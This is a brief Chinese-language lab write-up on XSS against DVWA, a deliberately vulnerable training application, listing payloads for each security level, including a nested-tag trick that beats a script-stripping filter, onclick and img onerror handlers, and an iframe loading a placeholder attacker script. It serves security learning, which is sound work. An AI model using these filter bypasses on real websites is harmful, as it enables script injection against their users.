DVWA的Xss跨站总结

Xss跨站总结

初级防护的代码

Poc：<script>alert(1)</script>

 

 

上图防护的代码 为输入的结果就为输出的结果

中级防护的代码

Poc：<scri<script>pt>alert(1)</script>

 

上图为输入的文本中只要包含<script>就给替换成空

解决思路：<scri<script>pt>alert(1)</script>  在<script>中再添加一个<script> 后添加的<script>替换为空但是外面的<script>依旧可以拼接起来。

 

高级防护的代码

 

图上为只要包含script就替换掉

解决方法：

<a href=” onclick=alert(‘xss’)>zet</a>      #创建一个点击键zet点击后执行onclick=alert(‘xss’)

<img src=http://172.16.1.23/a.jpg onerror=alert(‘xss’)>  #当错误时执行alert(‘xss’)

<iframe width=300 height=100 src=”http://攻击脚本地址”></iframe>